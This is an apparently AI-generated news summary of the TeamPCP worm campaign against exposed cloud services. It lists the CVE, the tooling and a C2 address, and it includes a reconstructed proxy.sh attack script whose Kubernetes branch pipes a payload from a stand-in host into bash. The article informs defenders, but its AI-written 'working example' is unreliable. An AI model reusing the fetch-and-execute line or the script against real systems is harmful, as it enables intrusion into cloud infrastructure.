TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure
These articles are AI-generated summaries. Please check the original sources for full details.
TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure
The TeamPCP campaign, observed around December 25, 2025, has systematically targeted cloud native environments to set up malicious infrastructure for follow-on exploitation, leveraging exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers. The campaign has been attributed to a threat cluster known as TeamPCP, which is known to be active since at least November 2025.
Why This Matters
The TeamPCP campaign highlights the technical reality of cloud-native cybercrime, where attackers leverage misconfigured infrastructure and known vulnerabilities to build a distributed proxy and scanning infrastructure at scale. This approach allows them to compromise servers, exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency, resulting in significant financial losses and reputational damage. According to Flare security researcher Assaf Morag, the campaign’s goals were to build a self-propagating criminal ecosystem, which has already affected over 700 victims across diverse industries.
Key Insights
- The TeamPCP campaign exploits known vulnerabilities, such as React2Shell (CVE-2025-55182, CVSS score: 10.0), to achieve remote command execution at scale.
- The campaign uses existing tools, such as proxy.sh, scanner.py, kube.py, react.py, and pcpcat.py, to automate and industrialize the exploitation process.
- The compromised infrastructure is misused for a wide range of purposes, including cryptocurrency mining, data hosting, proxy, and command-and-control (C2) relays, with the C2 server node located at 67.217.57[.]240 linked to the operation of Sliver, an open-source C2 framework.
Working Example
# Example of proxy.sh script
#!/bin/bash
# Install proxy, peer-to-peer (P2P), and tunneling utilities
apt-get update && apt-get install -y proxychains-ng
# Deliver various scanners to continuously search the internet for vulnerable and misconfigured servers
git clone https://github.com/DeadCatx3/CIDR-lists.git
# Perform environment fingerprinting at execution time
if [ -f "/etc/kubernetes/kubelet.conf" ]; then
# Drop a cluster-specific secondary payload
curl -s https://example.com/payload.sh | bash
fiPractical Applications
- Use Case: Amazon Web Services (AWS) and Microsoft Azure environments are primarily targeted by the TeamPCP campaign, which demonstrates the importance of securing cloud infrastructure against opportunistic attacks.
- Pitfall: Organizations that run misconfigured infrastructure become “collateral victims” in the process, highlighting the need for regular security audits and vulnerability assessments to prevent such attacks.
References:
Continue reading
Next article
The Roadhouse Pattern for Failing Fast and Clean Code
Related Content
Google Looker Bugs Allow Cross-Tenant RCE, Data Exfil
Attackers could gain access to other Google Cloud tenants' environments through two security issues in Google Looker, affecting over 60,000 companies.
AWS Unveils $50B, 1.3 Gigawatt Investment in Government Cloud Regions for AI & HPC
AWS commits $50 billion over ten years to deliver 1.3 gigawatts of GPU/CPU capacity across U.S. government regions, accelerating AI and HPC for regulated sectors.
Attackers Harvest Dropbox Logins Via Fake PDF Lures
A malware-free phishing campaign targeting corporate inboxes has led to Dropbox credential theft, with over 100 organizations affected.